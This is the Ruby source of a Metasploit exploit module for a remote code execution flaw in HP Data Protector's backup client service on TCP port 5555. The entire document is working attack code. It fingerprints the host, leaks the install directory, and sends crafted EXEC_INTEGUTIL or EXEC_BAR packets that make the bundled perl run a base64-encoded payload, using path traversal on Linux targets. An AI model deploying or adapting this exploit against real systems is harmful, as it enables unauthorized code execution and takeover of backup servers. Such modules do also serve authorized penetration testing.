## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector EXEC_INTEGUTIL Remote Code Execution', 'Description' => %q{ This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL request allows to execute arbitrary commands from a restricted directory. Since it includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP Data Protector for linux. This module has been tested successfully on HP Data Protector 9 over Windows 2008 R2 64 bits and CentOS 6 64 bits. }, 'Author' => [ 'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # vulnerability discovery 'juan vazquez' # msf module ], 'References' => [ [ 'ZDI', '14-344'] ], 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { # The powershell embedded payload takes some time to deploy 'WfsDelay' => 20 }, 'Targets' => [ [ 'Linux 64 bits / HP Data Protector 9', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'perl gawk bash-tcp openssl python generic' } } } ], [ 'Windows 64 bits / HP Data Protector 9', { 'Platform' => 'win', 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'powershell' } } } ] ], 'DefaultTarget' => 0, 'Privileged' => true, 'DisclosureDate' => 'Oct 2 2014' )) register_options( [ Opt::RPORT(5555) ], self.class) end def check fingerprint = get_fingerprint if fingerprint.nil? return Exploit::CheckCode::Unknown end if fingerprint =~ /Data Protector A\.(\d+\.\d+)/ version = $1 vprint_status("#{peer} - Windows / HP Data Protector version #{version} found") elsif fingerprint =~ / INET/ vprint_status("#{peer} - Linux / HP Data Protector found") return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end if Gem::Version.new(version) <= Gem::Version.new('9') return Exploit::CheckCode::Appears end Exploit::CheckCode::Detected # there is no patch at the time of module writing end def exploit rand_exec = rand_text_alpha(8) print_status("#{peer} - Leaking the HP Data Protector directory...") leak = leak_hp_directory(rand_exec) dir = parse_dir(leak, rand_exec) if dir.nil? dir = default_hp_dir print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}") else unless valid_target?(dir) print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...") end end if target.name =~ /Windows/ #command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true}) print_status("#{peer} - Executing payload...") execute_windows(payload.encoded, dir) else print_status("#{peer} - Executing payload...") execute_linux(payload.encoded, dir) end end def peer "#{rhost}:#{rport}" end def build_pkt(fields) data = "\xff\xfe" # BOM Unicode fields.each do |v| data << "#{Rex::Text.to_unicode(v)}\x00\x00" data << Rex::Text.to_unicode(" ") # Separator end data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator return [data.length].pack("N") + data end def get_fingerprint fingerprint = get_fingerprint_windows if fingerprint.nil? fingerprint = get_fingerprint_linux end fingerprint end def get_fingerprint_linux connect sock.put([2].pack("N") + "\xff\xfe") begin res = sock.get_once(4) rescue EOFError disconnect return nil end if res.nil? disconnect return nil else length = res.unpack("N")[0] end begin res = sock.get_once(length) rescue EOFError return nil ensure disconnect end if res.nil? return nil end res end def get_fingerprint_windows connect sock.put(rand_text_alpha_upper(64)) begin res = sock.get_once(4) rescue ::Errno::ECONNRESET, EOFError disconnect return nil end if res.nil? disconnect return nil else length = res.unpack("N")[0] end begin res = sock.get_once(length) rescue EOFError return nil ensure disconnect end if res.nil? return nil end Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null end def leak_hp_directory(rand_exec) connect pkt = build_pkt([ "2", # Message Type rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "28", # Opcode EXEC_INTEGUTIL rand_exec, ]) sock.put(pkt) begin res = sock.get_once(4) rescue EOFError disconnect return nil end if res.nil? disconnect return nil else length = res.unpack("N")[0] end begin res = sock.get_once(length) rescue EOFError return nil ensure disconnect end if res.nil? return nil end if res =~ /No such file or directory/ # Linux signature return res else # deal as windows target return Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null end end def parse_dir(data, clue) if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/ dir = $1 print_good("#{peer} - HP Data Protector directory found on #{dir}") elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/ dir = $1 print_good("#{peer} - HP Data Protector directory found on #{dir}") else dir = nil end dir end def valid_target?(dir) if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\/ return true elsif target.name =~ /Linux/ && dir.start_with?('/') return true end false end def default_hp_dir if target.name =~ /Windows/ dir = 'C:\\Program Files\\OmniBack\\' else # linux dir = '/opt/omni/lbin/' end dir end def execute_windows(cmd, hp_dir) connect pkt = build_pkt([ "2", # Message Type rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "28", # Opcode EXEC_INTEGUTIL "perl.exe", "-I#{hp_dir}lib\\perl", "-MMIME::Base64", "-e", "system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))" ]) sock.put(pkt) disconnect end def execute_linux(cmd, hp_dir) connect pkt = build_pkt([ '2', # Message Type rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), '11', # Opcode EXEC_BAR rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), rand_text_alpha(8), "../bin/perl", rand_text_alpha(8), "-I#{hp_dir}lib/perl", '-MMIME::Base64', '-e', "system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))" ]) sock.put(pkt) disconnect end end